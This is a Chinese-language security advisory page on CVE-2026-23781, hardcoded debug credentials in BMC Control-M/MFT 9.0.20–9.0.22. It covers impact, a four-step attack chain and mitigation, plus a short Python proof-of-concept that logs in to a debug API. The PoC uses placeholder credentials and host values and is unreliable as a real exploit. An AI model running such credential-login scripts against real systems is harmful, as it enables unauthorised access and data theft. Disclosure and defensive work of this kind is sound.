CVE-2026-23781 CVSS 9.8 严重

CVE-2026-23781 BMC Control-M/MFT 硬编码凭据漏洞

披露日期: 2026-04-10

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-23781

漏洞类型

硬编码凭据

CVSS评分

9.8 严重

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

BMC Control-M/MFT

漏洞概述

BMC Control-M/MFT 9.0.20至9.0.22版本存在严重安全漏洞。由于应用程序在安装包中以明文形式硬编码了一组默认调试用户凭据，若管理员未及时更改，攻击者可轻易获取这些凭据。利用该漏洞，攻击者无需认证即可登录MFT API调试接口，进而获取系统敏感数据、篡改配置或破坏服务，造成严重影响。

技术细节

该漏洞的根源在于开发人员在BMC Control-M/MFT的应用程序代码或配置文件中遗留了调试用的默认账号和密码，且未经过加密处理。这些凭据随着软件包一同分发，任何拥有软件访问权限的人员均可通过解压或反编译获取。攻击者获取到明文凭据后，可直接向MFT模块的调试接口发送认证请求。由于CVSS向量显示无需用户交互且无需权限，攻击者可远程利用此漏洞获取高级别权限。一旦成功访问调试接口，攻击者不仅能够查看敏感的文件传输日志和配置信息，还可能利用调试功能执行恶意命令，导致机密性、完整性和可用性全面受损。

攻击链分析

STEP 1

侦察与识别

攻击者识别目标系统运行BMC Control-M/MFT，并确认版本在受影响范围内（9.0.20至9.0.22）。

STEP 2

提取凭据

攻击者获取应用程序安装包，通过解压文件或搜索源代码，找到明文存储的默认调试用户名和密码。

STEP 3

未授权访问

攻击者使用获取到的凭据，向MFT API调试接口发送请求，绕过正常的身份验证机制。

STEP 4

执行利用

成功登录后，攻击者利用调试接口的功能执行系统命令、下载敏感文件或篡改传输配置。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target URL for the MFT API Debug Interface
target_url = "http://target-host:port/mft/api/debug"

# Hardcoded credentials extracted from the application package
username = "debug_user"
password = "hardcoded_password"

def exploit():
    print(f"[*] Attempting to connect to {target_url}...")
    
    # Example using Basic Authentication
    response = requests.get(target_url, auth=(username, password), verify=False)
    
    if response.status_code == 200:
        print("[+] Exploit successful! Access granted to debug interface.")
        print("[+] Response data:")
        print(response.text)
    else:
        print("[-] Exploit failed.")
        print(f"[-] Status code: {response.status_code}")

if __name__ == "__main__":
    exploit()

影响范围

BMC Control-M/MFT 9.0.20

BMC Control-M/MFT 9.0.21

BMC Control-M/MFT 9.0.22

防御指南

临时缓解措施

建议立即检查并修改BMC Control-M/MFT中的默认调试账户凭据。同时，应通过网络防火墙或ACL策略严格限制对MFT API调试接口的外部访问，仅允许受信任的内部IP地址连接，直至完成官方补丁更新。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表